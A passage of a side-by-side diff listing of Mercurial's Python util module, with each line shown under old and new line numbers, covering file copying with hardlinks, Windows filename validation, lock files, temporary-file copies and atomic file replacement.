1754 def copyfiles(src, dst, hardlink=None, progress=None):
1749 """Copy a directory tree using hardlinks if possible."""
1755 """Copy a directory tree using hardlinks if possible."""
1750 num = 0
1756 num = 0
1751
1757
1752 def settopic():
1758 def settopic():
1753 if progress:
1759 if progress:
1754 progress.topic = _('linking') if hardlink else _('copying')
1760 progress.topic = _('linking') if hardlink else _('copying')
1755
1761
1756 if os.path.isdir(src):
1762 if os.path.isdir(src):
1757 if hardlink is None:
1763 if hardlink is None:
1758 hardlink = (os.stat(src).st_dev ==
1764 hardlink = (os.stat(src).st_dev ==
1759 os.stat(os.path.dirname(dst)).st_dev)
1765 os.stat(os.path.dirname(dst)).st_dev)
1760 settopic()
1766 settopic()
1761 os.mkdir(dst)
1767 os.mkdir(dst)
1762 for name, kind in listdir(src):
1768 for name, kind in listdir(src):
1763 srcname = os.path.join(src, name)
1769 srcname = os.path.join(src, name)
1764 dstname = os.path.join(dst, name)
1770 dstname = os.path.join(dst, name)
1765 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1766 num += n
1772 num += n
1767 else:
1773 else:
1768 if hardlink is None:
1774 if hardlink is None:
1769 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1770 os.stat(os.path.dirname(dst)).st_dev)
1776 os.stat(os.path.dirname(dst)).st_dev)
1771 settopic()
1777 settopic()
1772
1778
1773 if hardlink:
1779 if hardlink:
1774 try:
1780 try:
1775 oslink(src, dst)
1781 oslink(src, dst)
1776 except (IOError, OSError):
1782 except (IOError, OSError):
1777 hardlink = False
1783 hardlink = False
1778 shutil.copy(src, dst)
1784 shutil.copy(src, dst)
1779 else:
1785 else:
1780 shutil.copy(src, dst)
1786 shutil.copy(src, dst)
1781 num += 1
1787 num += 1
1782 if progress:
1788 if progress:
1783 progress.increment()
1789 progress.increment()
1784
1790
1785 return hardlink, num
1791 return hardlink, num
1786
1792
1787 _winreservednames = {
1793 _winreservednames = {
1788 'con', 'prn', 'aux', 'nul',
1794 'con', 'prn', 'aux', 'nul',
1789 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1790 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1791 }
1797 }
1792 _winreservedchars = ':*?"<>|'
1798 _winreservedchars = ':*?"<>|'
1793 def checkwinfilename(path):
1799 def checkwinfilename(path):
1794 r'''Check that the base-relative path is a valid filename on Windows.
1800 r'''Check that the base-relative path is a valid filename on Windows.
1795 Returns None if the path is ok, or a UI string describing the problem.
1801 Returns None if the path is ok, or a UI string describing the problem.
1796
1802
1797 >>> checkwinfilename(b"just/a/normal/path")
1803 >>> checkwinfilename(b"just/a/normal/path")
1798 >>> checkwinfilename(b"foo/bar/con.xml")
1804 >>> checkwinfilename(b"foo/bar/con.xml")
1799 "filename contains 'con', which is reserved on Windows"
1805 "filename contains 'con', which is reserved on Windows"
1800 >>> checkwinfilename(b"foo/con.xml/bar")
1806 >>> checkwinfilename(b"foo/con.xml/bar")
1801 "filename contains 'con', which is reserved on Windows"
1807 "filename contains 'con', which is reserved on Windows"
1802 >>> checkwinfilename(b"foo/bar/xml.con")
1808 >>> checkwinfilename(b"foo/bar/xml.con")
1803 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1804 "filename contains 'AUX', which is reserved on Windows"
1810 "filename contains 'AUX', which is reserved on Windows"
1805 >>> checkwinfilename(b"foo/bar/bla:.txt")
1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1806 "filename contains ':', which is reserved on Windows"
1812 "filename contains ':', which is reserved on Windows"
1807 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1808 "filename contains '\\x07', which is invalid on Windows"
1814 "filename contains '\\x07', which is invalid on Windows"
1809 >>> checkwinfilename(b"foo/bar/bla ")
1815 >>> checkwinfilename(b"foo/bar/bla ")
1810 "filename ends with ' ', which is not allowed on Windows"
1816 "filename ends with ' ', which is not allowed on Windows"
1811 >>> checkwinfilename(b"../bar")
1817 >>> checkwinfilename(b"../bar")
1812 >>> checkwinfilename(b"foo\\")
1818 >>> checkwinfilename(b"foo\\")
1813 "filename ends with '\\', which is invalid on Windows"
1819 "filename ends with '\\', which is invalid on Windows"
1814 >>> checkwinfilename(b"foo\\/bar")
1820 >>> checkwinfilename(b"foo\\/bar")
1815 "directory name ends with '\\', which is invalid on Windows"
1821 "directory name ends with '\\', which is invalid on Windows"
1816 '''
1822 '''
1817 if path.endswith('\\'):
1823 if path.endswith('\\'):
1818 return _("filename ends with '\\', which is invalid on Windows")
1824 return _("filename ends with '\\', which is invalid on Windows")
1819 if '\\/' in path:
1825 if '\\/' in path:
1820 return _("directory name ends with '\\', which is invalid on Windows")
1826 return _("directory name ends with '\\', which is invalid on Windows")
1821 for n in path.replace('\\', '/').split('/'):
1827 for n in path.replace('\\', '/').split('/'):
1822 if not n:
1828 if not n:
1823 continue
1829 continue
1824 for c in _filenamebytestr(n):
1830 for c in _filenamebytestr(n):
1825 if c in _winreservedchars:
1831 if c in _winreservedchars:
1826 return _("filename contains '%s', which is reserved "
1832 return _("filename contains '%s', which is reserved "
1827 "on Windows") % c
1833 "on Windows") % c
1828 if ord(c) <= 31:
1834 if ord(c) <= 31:
1829 return _("filename contains '%s', which is invalid "
1835 return _("filename contains '%s', which is invalid "
1830 "on Windows") % stringutil.escapestr(c)
1836 "on Windows") % stringutil.escapestr(c)
1831 base = n.split('.')[0]
1837 base = n.split('.')[0]
1832 if base and base.lower() in _winreservednames:
1838 if base and base.lower() in _winreservednames:
1833 return _("filename contains '%s', which is reserved "
1839 return _("filename contains '%s', which is reserved "
1834 "on Windows") % base
1840 "on Windows") % base
1835 t = n[-1:]
1841 t = n[-1:]
1836 if t in '. ' and n not in '..':
1842 if t in '. ' and n not in '..':
1837 return _("filename ends with '%s', which is not allowed "
1843 return _("filename ends with '%s', which is not allowed "
1838 "on Windows") % t
1844 "on Windows") % t
1839
1845
1840 if pycompat.iswindows:
1846 if pycompat.iswindows:
1841 checkosfilename = checkwinfilename
1847 checkosfilename = checkwinfilename
1842 timer = time.clock
1848 timer = time.clock
1843 else:
1849 else:
1844 checkosfilename = platform.checkosfilename
1850 checkosfilename = platform.checkosfilename
1845 timer = time.time
1851 timer = time.time
1846
1852
1847 if safehasattr(time, "perf_counter"):
1853 if safehasattr(time, "perf_counter"):
1848 timer = time.perf_counter
1854 timer = time.perf_counter
1849
1855
1850 def makelock(info, pathname):
1856 def makelock(info, pathname):
1851 """Create a lock file atomically if possible
1857 """Create a lock file atomically if possible
1852
1858
1853 This may leave a stale lock file if symlink isn't supported and signal
1859 This may leave a stale lock file if symlink isn't supported and signal
1854 interrupt is enabled.
1860 interrupt is enabled.
1855 """
1861 """
1856 try:
1862 try:
1857 return os.symlink(info, pathname)
1863 return os.symlink(info, pathname)
1858 except OSError as why:
1864 except OSError as why:
1859 if why.errno == errno.EEXIST:
1865 if why.errno == errno.EEXIST:
1860 raise
1866 raise
1861 except AttributeError: # no symlink in os
1867 except AttributeError: # no symlink in os
1862 pass
1868 pass
1863
1869
1864 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1865 ld = os.open(pathname, flags)
1871 ld = os.open(pathname, flags)
1866 os.write(ld, info)
1872 os.write(ld, info)
1867 os.close(ld)
1873 os.close(ld)
1868
1874
1869 def readlock(pathname):
1875 def readlock(pathname):
1870 try:
1876 try:
1871 return readlink(pathname)
1877 return readlink(pathname)
1872 except OSError as why:
1878 except OSError as why:
1873 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1874 raise
1880 raise
1875 except AttributeError: # no symlink in os
1881 except AttributeError: # no symlink in os
1876 pass
1882 pass
1877 with posixfile(pathname, 'rb') as fp:
1883 with posixfile(pathname, 'rb') as fp:
1878 return fp.read()
1884 return fp.read()
1879
1885
1880 def fstat(fp):
1886 def fstat(fp):
1881 '''stat file object that may not have fileno method.'''
1887 '''stat file object that may not have fileno method.'''
1882 try:
1888 try:
1883 return os.fstat(fp.fileno())
1889 return os.fstat(fp.fileno())
1884 except AttributeError:
1890 except AttributeError:
1885 return os.stat(fp.name)
1891 return os.stat(fp.name)
1886
1892
1887 # File system features
1893 # File system features
1888
1894
1889 def fscasesensitive(path):
1895 def fscasesensitive(path):
1890 """
1896 """
1891 Return true if the given path is on a case-sensitive filesystem
1897 Return true if the given path is on a case-sensitive filesystem
1892
1898
1893 Requires a path (like /foo/.hg) ending with a foldable final
1899 Requires a path (like /foo/.hg) ending with a foldable final
1894 directory component.
1900 directory component.
1895 """
1901 """
1896 s1 = os.lstat(path)
1902 s1 = os.lstat(path)
1897 d, b = os.path.split(path)
1903 d, b = os.path.split(path)
1898 b2 = b.upper()
1904 b2 = b.upper()
1899 if b == b2:
1905 if b == b2:
1900 b2 = b.lower()
1906 b2 = b.lower()
1901 if b == b2:
1907 if b == b2:
1902 return True # no evidence against case sensitivity
1908 return True # no evidence against case sensitivity
1903 p2 = os.path.join(d, b2)
1909 p2 = os.path.join(d, b2)
1904 try:
1910 try:
1905 s2 = os.lstat(p2)
1911 s2 = os.lstat(p2)
1906 if s2 == s1:
1912 if s2 == s1:
1907 return False
1913 return False
1908 return True
1914 return True
1909 except OSError:
1915 except OSError:
1910 return True
1916 return True
1911
1917
1912 try:
1918 try:
1913 import re2
1919 import re2
1914 _re2 = None
1920 _re2 = None
1915 except ImportError:
1921 except ImportError:
1916 _re2 = False
1922 _re2 = False
1917
1923
1918 class _re(object):
1924 class _re(object):
1919 def _checkre2(self):
1925 def _checkre2(self):
1920 global _re2
1926 global _re2
1921 try:
1927 try:
1922 # check if match works, see issue3964
1928 # check if match works, see issue3964
1923 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1924 except ImportError:
1930 except ImportError:
1925 _re2 = False
1931 _re2 = False
1926
1932
1927 def compile(self, pat, flags=0):
1933 def compile(self, pat, flags=0):
1928 '''Compile a regular expression, using re2 if possible
1934 '''Compile a regular expression, using re2 if possible
1929
1935
1930 For best performance, use only re2-compatible regexp features. The
1936 For best performance, use only re2-compatible regexp features. The
1931 only flags from the re module that are re2-compatible are
1937 only flags from the re module that are re2-compatible are
1932 IGNORECASE and MULTILINE.'''
1938 IGNORECASE and MULTILINE.'''
1933 if _re2 is None:
1939 if _re2 is None:
1934 self._checkre2()
1940 self._checkre2()
1935 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1936 if flags & remod.IGNORECASE:
1942 if flags & remod.IGNORECASE:
1937 pat = '(?i)' + pat
1943 pat = '(?i)' + pat
1938 if flags & remod.MULTILINE:
1944 if flags & remod.MULTILINE:
1939 pat = '(?m)' + pat
1945 pat = '(?m)' + pat
1940 try:
1946 try:
1941 return re2.compile(pat)
1947 return re2.compile(pat)
1942 except re2.error:
1948 except re2.error:
1943 pass
1949 pass
1944 return remod.compile(pat, flags)
1950 return remod.compile(pat, flags)
1945
1951
1946 @propertycache
1952 @propertycache
1947 def escape(self):
1953 def escape(self):
1948 '''Return the version of escape corresponding to self.compile.
1954 '''Return the version of escape corresponding to self.compile.
1949
1955
1950 This is imperfect because whether re2 or re is used for a particular
1956 This is imperfect because whether re2 or re is used for a particular
1951 function depends on the flags, etc, but it's the best we can do.
1957 function depends on the flags, etc, but it's the best we can do.
1952 '''
1958 '''
1953 global _re2
1959 global _re2
1954 if _re2 is None:
1960 if _re2 is None:
1955 self._checkre2()
1961 self._checkre2()
1956 if _re2:
1962 if _re2:
1957 return re2.escape
1963 return re2.escape
1958 else:
1964 else:
1959 return remod.escape
1965 return remod.escape
1960
1966
1961 re = _re()
1967 re = _re()
1962
1968
1963 _fspathcache = {}
1969 _fspathcache = {}
1964 def fspath(name, root):
1970 def fspath(name, root):
1965 '''Get name in the case stored in the filesystem
1971 '''Get name in the case stored in the filesystem
1966
1972
1967 The name should be relative to root, and be normcase-ed for efficiency.
1973 The name should be relative to root, and be normcase-ed for efficiency.
1968
1974
1969 Note that this function is unnecessary, and should not be
1975 Note that this function is unnecessary, and should not be
1970 called, for case-sensitive filesystems (simply because it's expensive).
1976 called, for case-sensitive filesystems (simply because it's expensive).
1971
1977
1972 The root should be normcase-ed, too.
1978 The root should be normcase-ed, too.
1973 '''
1979 '''
1974 def _makefspathcacheentry(dir):
1980 def _makefspathcacheentry(dir):
1975 return dict((normcase(n), n) for n in os.listdir(dir))
1981 return dict((normcase(n), n) for n in os.listdir(dir))
1976
1982
1977 seps = pycompat.ossep
1983 seps = pycompat.ossep
1978 if pycompat.osaltsep:
1984 if pycompat.osaltsep:
1979 seps = seps + pycompat.osaltsep
1985 seps = seps + pycompat.osaltsep
1980 # Protect backslashes. This gets silly very quickly.
1986 # Protect backslashes. This gets silly very quickly.
1981 seps.replace('\\','\\\\')
1987 seps.replace('\\','\\\\')
1982 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1983 dir = os.path.normpath(root)
1989 dir = os.path.normpath(root)
1984 result = []
1990 result = []
1985 for part, sep in pattern.findall(name):
1991 for part, sep in pattern.findall(name):
1986 if sep:
1992 if sep:
1987 result.append(sep)
1993 result.append(sep)
1988 continue
1994 continue
1989
1995
1990 if dir not in _fspathcache:
1996 if dir not in _fspathcache:
1991 _fspathcache[dir] = _makefspathcacheentry(dir)
1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1992 contents = _fspathcache[dir]
1998 contents = _fspathcache[dir]
1993
1999
1994 found = contents.get(part)
2000 found = contents.get(part)
1995 if not found:
2001 if not found:
1996 # retry "once per directory" per "dirstate.walk" which
2002 # retry "once per directory" per "dirstate.walk" which
1997 # may take place for each patches of "hg qpush", for example
2003 # may take place for each patches of "hg qpush", for example
1998 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1999 found = contents.get(part)
2005 found = contents.get(part)
2000
2006
2001 result.append(found or part)
2007 result.append(found or part)
2002 dir = os.path.join(dir, part)
2008 dir = os.path.join(dir, part)
2003
2009
2004 return ''.join(result)
2010 return ''.join(result)
2005
2011
2006 def checknlink(testfile):
2012 def checknlink(testfile):
2007 '''check whether hardlink count reporting works properly'''
2013 '''check whether hardlink count reporting works properly'''
2008
2014
2009 # testfile may be open, so we need a separate file for checking to
2015 # testfile may be open, so we need a separate file for checking to
2010 # work around issue2543 (or testfile may get lost on Samba shares)
2016 # work around issue2543 (or testfile may get lost on Samba shares)
2011 f1, f2, fp = None, None, None
2017 f1, f2, fp = None, None, None
2012 try:
2018 try:
2013 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2014 suffix='1~', dir=os.path.dirname(testfile))
2020 suffix='1~', dir=os.path.dirname(testfile))
2015 os.close(fd)
2021 os.close(fd)
2016 f2 = '%s2~' % f1[:-2]
2022 f2 = '%s2~' % f1[:-2]
2017
2023
2018 oslink(f1, f2)
2024 oslink(f1, f2)
2019 # nlinks() may behave differently for files on Windows shares if
2025 # nlinks() may behave differently for files on Windows shares if
2020 # the file is open.
2026 # the file is open.
2021 fp = posixfile(f2)
2027 fp = posixfile(f2)
2022 return nlinks(f2) > 1
2028 return nlinks(f2) > 1
2023 except OSError:
2029 except OSError:
2024 return False
2030 return False
2025 finally:
2031 finally:
2026 if fp is not None:
2032 if fp is not None:
2027 fp.close()
2033 fp.close()
2028 for f in (f1, f2):
2034 for f in (f1, f2):
2029 try:
2035 try:
2030 if f is not None:
2036 if f is not None:
2031 os.unlink(f)
2037 os.unlink(f)
2032 except OSError:
2038 except OSError:
2033 pass
2039 pass
2034
2040
2035 def endswithsep(path):
2041 def endswithsep(path):
2036 '''Check path ends with os.sep or os.altsep.'''
2042 '''Check path ends with os.sep or os.altsep.'''
2037 return (path.endswith(pycompat.ossep)
2043 return (path.endswith(pycompat.ossep)
2038 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2039
2045
2040 def splitpath(path):
2046 def splitpath(path):
2041 '''Split path by os.sep.
2047 '''Split path by os.sep.
2042 Note that this function does not use os.altsep because this is
2048 Note that this function does not use os.altsep because this is
2043 an alternative of simple "xxx.split(os.sep)".
2049 an alternative of simple "xxx.split(os.sep)".
2044 It is recommended to use os.path.normpath() before using this
2050 It is recommended to use os.path.normpath() before using this
2045 function if need.'''
2051 function if need.'''
2046 return path.split(pycompat.ossep)
2052 return path.split(pycompat.ossep)
2047
2053
2048 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2049 """Create a temporary file with the same contents from name
2055 """Create a temporary file with the same contents from name
2050
2056
2051 The permission bits are copied from the original file.
2057 The permission bits are copied from the original file.
2052
2058
2053 If the temporary file is going to be truncated immediately, you
2059 If the temporary file is going to be truncated immediately, you
2054 can use emptyok=True as an optimization.
2060 can use emptyok=True as an optimization.
2055
2061
2056 Returns the name of the temporary file.
2062 Returns the name of the temporary file.
2057 """
2063 """
2058 d, fn = os.path.split(name)
2064 d, fn = os.path.split(name)
2059 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2060 os.close(fd)
2066 os.close(fd)
2061 # Temporary files are created with mode 0600, which is usually not
2067 # Temporary files are created with mode 0600, which is usually not
2062 # what we want. If the original file already exists, just copy
2068 # what we want. If the original file already exists, just copy
2063 # its mode. Otherwise, manually obey umask.
2069 # its mode. Otherwise, manually obey umask.
2064 copymode(name, temp, createmode, enforcewritable)
2070 copymode(name, temp, createmode, enforcewritable)
2065
2071
2066 if emptyok:
2072 if emptyok:
2067 return temp
2073 return temp
2068 try:
2074 try:
2069 try:
2075 try:
2070 ifp = posixfile(name, "rb")
2076 ifp = posixfile(name, "rb")
2071 except IOError as inst:
2077 except IOError as inst:
2072 if inst.errno == errno.ENOENT:
2078 if inst.errno == errno.ENOENT:
2073 return temp
2079 return temp
2074 if not getattr(inst, 'filename', None):
2080 if not getattr(inst, 'filename', None):
2075 inst.filename = name
2081 inst.filename = name
2076 raise
2082 raise
2077 ofp = posixfile(temp, "wb")
2083 ofp = posixfile(temp, "wb")
2078 for chunk in filechunkiter(ifp):
2084 for chunk in filechunkiter(ifp):
2079 ofp.write(chunk)
2085 ofp.write(chunk)
2080 ifp.close()
2086 ifp.close()
2081 ofp.close()
2087 ofp.close()
2082 except: # re-raises
2088 except: # re-raises
2083 try:
2089 try:
2084 os.unlink(temp)
2090 os.unlink(temp)
2085 except OSError:
2091 except OSError:
2086 pass
2092 pass
2087 raise
2093 raise
2088 return temp
2094 return temp
2089
2095
2090 class filestat(object):
2096 class filestat(object):
2091 """help to exactly detect change of a file
2097 """help to exactly detect change of a file
2092
2098
2093 'stat' attribute is result of 'os.stat()' if specified 'path'
2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2094 exists. Otherwise, it is None. This can avoid preparative
2100 exists. Otherwise, it is None. This can avoid preparative
2095 'exists()' examination on client side of this class.
2101 'exists()' examination on client side of this class.
2096 """
2102 """
2097 def __init__(self, stat):
2103 def __init__(self, stat):
2098 self.stat = stat
2104 self.stat = stat
2099
2105
2100 @classmethod
2106 @classmethod
2101 def frompath(cls, path):
2107 def frompath(cls, path):
2102 try:
2108 try:
2103 stat = os.stat(path)
2109 stat = os.stat(path)
2104 except OSError as err:
2110 except OSError as err:
2105 if err.errno != errno.ENOENT:
2111 if err.errno != errno.ENOENT:
2106 raise
2112 raise
2107 stat = None
2113 stat = None
2108 return cls(stat)
2114 return cls(stat)
2109
2115
2110 @classmethod
2116 @classmethod
2111 def fromfp(cls, fp):
2117 def fromfp(cls, fp):
2112 stat = os.fstat(fp.fileno())
2118 stat = os.fstat(fp.fileno())
2113 return cls(stat)
2119 return cls(stat)
2114
2120
2115 __hash__ = object.__hash__
2121 __hash__ = object.__hash__
2116
2122
2117 def __eq__(self, old):
2123 def __eq__(self, old):
2118 try:
2124 try:
2119 # if ambiguity between stat of new and old file is
2125 # if ambiguity between stat of new and old file is
2120 # avoided, comparison of size, ctime and mtime is enough
2126 # avoided, comparison of size, ctime and mtime is enough
2121 # to exactly detect change of a file regardless of platform
2127 # to exactly detect change of a file regardless of platform
2122 return (self.stat.st_size == old.stat.st_size and
2128 return (self.stat.st_size == old.stat.st_size and
2123 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2124 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2125 except AttributeError:
2131 except AttributeError:
2126 pass
2132 pass
2127 try:
2133 try:
2128 return self.stat is None and old.stat is None
2134 return self.stat is None and old.stat is None
2129 except AttributeError:
2135 except AttributeError:
2130 return False
2136 return False
2131
2137
2132 def isambig(self, old):
2138 def isambig(self, old):
2133 """Examine whether new (= self) stat is ambiguous against old one
2139 """Examine whether new (= self) stat is ambiguous against old one
2134
2140
2135 "S[N]" below means stat of a file at N-th change:
2141 "S[N]" below means stat of a file at N-th change:
2136
2142
2137 - S[n-1].ctime < S[n].ctime: can detect change of a file
2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2138 - S[n-1].ctime == S[n].ctime
2144 - S[n-1].ctime == S[n].ctime
2139 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2140 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2141 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2142 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2143
2149
2144 Case (*2) above means that a file was changed twice or more at
2150 Case (*2) above means that a file was changed twice or more at
2145 same time in sec (= S[n-1].ctime), and comparison of timestamp
2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2146 is ambiguous.
2152 is ambiguous.
2147
2153
2148 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2149 timestamp is ambiguous".
2155 timestamp is ambiguous".
2150
2156
2151 But advancing mtime only in case (*2) doesn't work as
2157 But advancing mtime only in case (*2) doesn't work as
2152 expected, because naturally advanced S[n].mtime in case (*1)
2158 expected, because naturally advanced S[n].mtime in case (*1)
2153 might be equal to manually advanced S[n-1 or earlier].mtime.
2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2154
2160
2155 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2156 treated as ambiguous regardless of mtime, to avoid overlooking
2162 treated as ambiguous regardless of mtime, to avoid overlooking
2157 by confliction between such mtime.
2163 by confliction between such mtime.
2158
2164
2159 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2160 S[n].mtime", even if size of a file isn't changed.
2166 S[n].mtime", even if size of a file isn't changed.
2161 """
2167 """
2162 try:
2168 try:
2163 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2164 except AttributeError:
2170 except AttributeError:
2165 return False
2171 return False
2166
2172
2167 def avoidambig(self, path, old):
2173 def avoidambig(self, path, old):
2168 """Change file stat of specified path to avoid ambiguity
2174 """Change file stat of specified path to avoid ambiguity
2169
2175
2170 'old' should be previous filestat of 'path'.
2176 'old' should be previous filestat of 'path'.
2171
2177
2172 This skips avoiding ambiguity, if a process doesn't have
2178 This skips avoiding ambiguity, if a process doesn't have
2173 appropriate privileges for 'path'. This returns False in this
2179 appropriate privileges for 'path'. This returns False in this
2174 case.
2180 case.
2175
2181
2176 Otherwise, this returns True, as "ambiguity is avoided".
2182 Otherwise, this returns True, as "ambiguity is avoided".
2177 """
2183 """
2178 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2179 try:
2185 try:
2180 os.utime(path, (advanced, advanced))
2186 os.utime(path, (advanced, advanced))
2181 except OSError as inst:
2187 except OSError as inst:
2182 if inst.errno == errno.EPERM:
2188 if inst.errno == errno.EPERM:
2183 # utime() on the file created by another user causes EPERM,
2189 # utime() on the file created by another user causes EPERM,
2184 # if a process doesn't have appropriate privileges
2190 # if a process doesn't have appropriate privileges
2185 return False
2191 return False
2186 raise
2192 raise
2187 return True
2193 return True
2188
2194
2189 def __ne__(self, other):
2195 def __ne__(self, other):
2190 return not self == other
2196 return not self == other
2191
2197
2192 class atomictempfile(object):
2198 class atomictempfile(object):
2193 '''writable file object that atomically updates a file
2199 '''writable file object that atomically updates a file
2194
2200
2195 All writes will go to a temporary copy of the original file. Call
2201 All writes will go to a temporary copy of the original file. Call
2196 close() when you are done writing, and atomictempfile will rename
2202 close() when you are done writing, and atomictempfile will rename
2197 the temporary copy to the original name, making the changes
2203 the temporary copy to the original name, making the changes
2198 visible. If the object is destroyed without being closed, all your
2204 visible. If the object is destroyed without being closed, all your
2199 writes are discarded.
2205 writes are discarded.
2200
2206
2201 checkambig argument of constructor is used with filestat, and is
2207 checkambig argument of constructor is used with filestat, and is
2202 useful only if target file is guarded by any lock (e.g. repo.lock
2208 useful only if target file is guarded by any lock (e.g. repo.lock
2203 or repo.wlock).
2209 or repo.wlock).
2204 '''
2210 '''
2205 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2206 self.__name = name # permanent name
2212 self.__name = name # permanent name
2207 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2208 createmode=createmode,
2214 createmode=createmode,
2209 enforcewritable=('w' in mode))
2215 enforcewritable=('w' in mode))
2210
2216
2211 self._fp = posixfile(self._tempname, mode)
2217 self._fp = posixfile(self._tempname, mode)
2212 self._checkambig = checkambig
2218 self._checkambig = checkambig
2213
2219
2214 # delegated methods
2220 # delegated methods
2215 self.read = self._fp.read
2221 self.read = self._fp.read
2216 self.write = self._fp.write
2222 self.write = self._fp.write
2217 self.seek = self._fp.seek
2223 self.seek = self._fp.seek
2218 self.tell = self._fp.tell
2224 self.tell = self._fp.tell
2219 self.fileno = self._fp.fileno
2225 self.fileno = self._fp.fileno
2220
2226
2221 def close(self):
2227 def close(self):
2222 if not self._fp.closed:
2228 if not self._fp.closed:
2223 self._fp.close()
2229 self._fp.close()
2224 filename = localpath(self.__name)
2230 filename = localpath(self.__name)
2225 oldstat = self._checkambig and filestat.frompath(filename)
2231 oldstat = self._checkambig and filestat.frompath(filename)
2226 if oldstat and oldstat.stat:
2232 if oldstat and oldstat.stat:
2227 rename(self._tempname, filename)
2233 rename(self._tempname, filename)
2228 newstat = filestat.frompath(filename)
2234 newstat = filestat.frompath(filename)
2229 if newstat.isambig(oldstat):
2235 if newstat.isambig(oldstat):
2230 # stat of changed file is ambiguous to original one
2236 # stat of changed file is ambiguous to original one
2231 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2232 os.utime(filename, (advanced, advanced))
2238 os.utime(filename, (advanced, advanced))
2233 else:
2239 else:
2234 rename(self._tempname, filename)
2240 rename(self._tempname, filename)
2235
2241
2236 def discard(self):
2242 def discard(self):
2237 if not self._fp.closed:
2243 if not self._fp.closed:
2238 try:
2244 try:
2239 os.unlink(self._tempname)
2245 os.unlink(self._tempname)
2240 except OSError:
2246 except OSError:
2241 pass
2247 pass
2242 self._fp.close()
2248 self._fp.close()
2243
2249
2244 def __del__(self):
2250 def __del__(self):
2245 if safehasattr(self, '_fp'): # constructor actually did something
2251 if safehasattr(self, '_fp'): # constructor actually did something
2246 self.discard()
2252 self.discard()
2247
2253
2248 def __enter__(self):
2254 def __enter__(self):
2249 return self
2255 return self
2250
2256
2251 def __exit__(self, exctype, excvalue, traceback):
2257 def __exit__(self, exctype, excvalue, traceback):
2252 if exctype is not None:
2258 if exctype is not None:
2253 self.discard()
2259 self.discard()
2254 else:
2260 else:
2255 self.close()
2261 self.close()
2256
2262
2257 def unlinkpath(f, ignoremissing=False, rmdir=True):
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2258 """unlink and remove the directory if it is empty"""
